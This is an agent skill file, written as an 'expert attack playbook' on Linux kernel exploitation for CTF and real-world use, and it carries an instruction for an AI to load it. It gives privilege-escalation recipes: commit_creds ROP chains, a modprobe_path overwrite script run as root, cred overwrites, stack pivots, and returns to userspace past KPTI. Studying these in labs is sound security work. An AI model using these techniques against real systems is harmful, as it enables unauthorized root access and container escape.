---
name: kernel-exploitation
description: >-
  Linux kernel exploitation playbook. Use when exploiting kernel vulnerabilities (UAF, OOB, race condition, type confusion) for privilege escalation via commit_creds, modprobe_path overwrite, or kernel ROP chains in CTF and real-world scenarios.
---

# SKILL: Linux Kernel Exploitation — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI.

## 0. RELATED ROUTING

- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — userspace protections (NX, ASLR) also apply in kernel context
- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — kernel ROP reuses many userspace ROP concepts
- [heap-exploitation](../heap-exploitation/SKILL.md) — kernel SLUB is conceptually related to userspace heap
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) — non-exploit kernel privesc techniques

### Advanced References

- [KERNEL_MITIGATION_BYPASS.md](./KERNEL_MITIGATION_BYPASS.md) — KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques
- [KERNEL_HEAP_TECHNIQUES.md](./KERNEL_HEAP_TECHNIQUES.md) — SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation

---

## 1. EXPLOITATION MODEL

```
┌─────────────────────────────────────────────────────┐
│  1. Find Vulnerability                              │
│     (UAF, OOB, race, integer overflow, type confusion)│
├─────────────────────────────────────────────────────┤
│  2. Build Primitive                                 │
│     (arbitrary read, arbitrary write, controlled RIP)│
├─────────────────────────────────────────────────────┤
│  3. Bypass Mitigations                              │
│     (KASLR, SMEP, SMAP, KPTI)                     │
├─────────────────────────────────────────────────────┤
│  4. Escalate Privileges                             │
│     (commit_creds, modprobe_path, namespace escape)  │
├─────────────────────────────────────────────────────┤
│  5. Return to Userspace Cleanly                     │
│     (KPTI trampoline, iretq/sysretq, swapgs)       │
└─────────────────────────────────────────────────────┘
```

---

## 2. ENVIRONMENT SETUP

### QEMU + Custom Kernel

```bash
# Download and compile kernel
wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz
tar xf linux-6.1.tar.xz && cd linux-6.1
make defconfig
# Disable mitigations for easier debugging:
scripts/config --disable RANDOMIZE_BASE      # KASLR
scripts/config --disable RANDOMIZE_LAYOUT    # FG-KASLR
scripts/config --enable DEBUG_INFO
make -j$(nproc)

# Boot with QEMU
qemu-system-x86_64 \
  -kernel bzImage \
  -initrd rootfs.cpio.gz \
  -append "console=ttyS0 nokaslr quiet" \
  -nographic \
  -s -S \    # GDB server on :1234, pause at start
  -monitor /dev/null \
  -m 256M \
  -cpu kvm64,+smep,+smap
```

### GDB Debugging

```bash
gdb vmlinux
target remote :1234
# Load kernel symbols
add-symbol-file vmlinux 0xffffffff81000000  # typical .text base
# Breakpoints
b commit_creds
b *0xffffffff81234567
# pwndbg/GEF work with kernel debugging
```

### initramfs Modification

```bash
mkdir rootfs && cd rootfs
cpio -idmv < ../rootfs.cpio.gz
# Edit init script, add exploit binary
cp /path/to/exploit ./
# Repack
find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz
```

---

## 3. COMMON VULNERABILITY TYPES

| Type | Description | Kernel Example |
|---|---|---|
| UAF | Object freed but pointer still accessible | CVE-2022-0847 (DirtyPipe) |
| OOB Read/Write | Array index or size check missing | CVE-2021-22555 (Netfilter) |
| Race Condition | TOCTOU between check and use | CVE-2016-5195 (DirtyCow) |
| Integer Overflow | Size calculation wraps around | Various ioctl handlers |
| Type Confusion | Object cast to wrong type | CVE-2023-0179 (Netfilter) |
| Double Free | Object freed twice | SLUB allocator exploitation |
| Stack Overflow | Kernel stack buffer overflow | Rare (kernel stack is small: 8KB–16KB) |

---

## 4. PRIVILEGE ESCALATION TARGETS

### Method 1: commit_creds(prepare_kernel_cred(0))

```c
// Kernel function that sets current process credentials to root
void (*commit_creds)(void *) = COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = PREPARE_KERNEL_CRED_ADDR;
commit_creds(prepare_kernel_cred(0));  // cred with uid=0, gid=0
```

Kernel ROP chain equivalent:
```
pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) = init_cred
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace
```

### Method 2: modprobe_path Overwrite

```c
// modprobe_path = "/sbin/modprobe" in kernel .data
// Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root
```

```bash
# Setup:
echo '#!/bin/sh' > /tmp/x
echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x
chmod +x /tmp/x
# Trigger (unknown binary format):
echo -ne '\xff\xff\xff\xff' > /tmp/dummy
chmod +x /tmp/dummy
/tmp/dummy  # kernel calls modprobe_path → /tmp/x runs as root
```

### Method 3: cred Structure Direct Overwrite

If you can find the current task's `cred` pointer and have arbitrary write, directly zero out uid/gid fields in the cred structure.

### Method 4: Namespace Escape (Containers)

Overwrite `init_nsproxy` or manipulate namespace pointers to escape container isolation.

---

## 5. KERNEL ROP

### Controlled RIP Sources

| Source | Mechanism |
|---|---|
| Corrupted function pointer | UAF object has vtable-like dispatch → overwrite pointer |
| Corrupted return address | Kernel stack overflow (rare) |
| Corrupted `ops` structure | Module operations struct (file_operations, seq_operations) |

### seq_operations Hijack (Common CTF Pattern)

```c
struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int (*show)(struct seq_file *, void *);
};
// Size: 0x20 (fits in kmalloc-32)
// Open /proc/self/stat → allocates seq_operations
// UAF overwrite start → controlled RIP when read() is called
```

### Stack Pivoting in Kernel

| Gadget | Usage |
|---|---|
| `xchg eax, esp; ret` | Pivot to address in lower 32 bits of RAX (mmap buffer at known addr) |
| `mov rsp, [rdi+X]; ...` | If RDI points to controlled data |
| `push rdi; pop rsp; ...` | Pivot to RDI (first arg of hijacked function) |

**Important**: After SMEP, cannot execute userspace code. ROP chain must use **kernel gadgets** only.

---

## 6. ret2usr (Pre-SMEP)

Directly call a userspace function from kernel context:

```c
void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory
```

**Blocked by**: SMEP (Supervisor Mode Execution Prevention) — kernel cannot execute user-mapped pages.

---

## 7. RETURNING TO USERSPACE

After privilege escalation in kernel, must return cleanly to userspace to get a root shell.

### Via iretq (Traditional)

```nasm
; ROP chain ending:
swapgs                     ; swap GS base back to userspace
iretq                      ; pops: RIP, CS, RFLAGS, RSP, SS from stack
; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]
```

```python
# Save userspace state before entering kernel
user_cs = 0x33
user_ss = 0x2b
user_rflags = # saved via pushfq before exploit
user_rsp = # saved RSP
user_rip = # address of post-exploit function (e.g., get_shell)
```

### Via KPTI Trampoline (When KPTI Enabled)

KPTI separates kernel/user page tables. Direct `swapgs; iretq` crashes because user pages aren't mapped. Use the kernel's own return trampoline:

```
# KPTI trampoline (in kernel at known offset):
# swapgs_restore_regs_and_return_to_usermode:
#   mov rdi, rsp
#   ...
#   swapgs
#   iretq
# Jump to trampoline with [RIP, CS, RFLAGS, RSP, SS] on stack
```

### Via signal Handler Return

Set up a signal handler before exploit. After `commit_creds`, trigger the signal → return to userspace via signal handler (avoids manual swapgs/iretq).

---

## 8. QEMU DEBUGGING TIPS

| Command | Purpose |
|---|---|
| `-s -S` | GDB server on :1234, paused |
| `-monitor /dev/null` | Disable QEMU monitor (cleaner output) |
| `-append "nokaslr"` | Disable KASLR for debugging |
| `-cpu kvm64,+smep,+smap` | Enable specific CPU features |
| `info registers` (GDB) | Show all register values |
| `maintenance packet Qqemu.PhyMemMode:1` | Read physical memory in GDB |
| `cat /proc/kallsyms` | Kernel symbol addresses (if readable) |
| `cat /sys/kernel/notes` | Kernel build ID |

---

## 9. DECISION TREE

```
Kernel vulnerability identified
├── What type?
│   ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES)
│   ├── OOB → determine read/write range, target adjacent objects
│   ├── Race condition → reliable trigger (userfaultfd, FUSE)
│   ├── Integer overflow → how does it translate to OOB or allocation confusion?
│   └── Type confusion → what can the confused type access?
│
├── Build primitive
│   ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP)
│   ├── Arbitrary read? → leak KASLR base, then controlled RIP
│   ├── Arbitrary write? → modprobe_path overwrite (simplest)
│   │                      or overwrite cred structure directly
│   └── Limited write? → target function pointer in known object
│
├── Mitigations (see KERNEL_MITIGATION_BYPASS.md)
│   ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read)
│   ├── SMEP → kernel ROP only (no user code exec)
│   ├── SMAP → cannot read user data from kernel (use copy_from_user gadget)
│   ├── KPTI → use KPTI trampoline for clean return
│   └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path)
│
├── Escalation method
│   ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds
│   ├── Have arbitrary write only → modprobe_path overwrite
│   ├── Have arbitrary write + KASLR bypass → overwrite cred uid/gid to 0
│   └── Have controlled function call → call commit_creds(prepare_kernel_cred(0))
│
└── Return to userspace
    ├── KPTI disabled → swapgs; iretq (ROP ending)
    ├── KPTI enabled → jump to KPTI trampoline
    └── Alternative → signal handler + process_one_work return path
```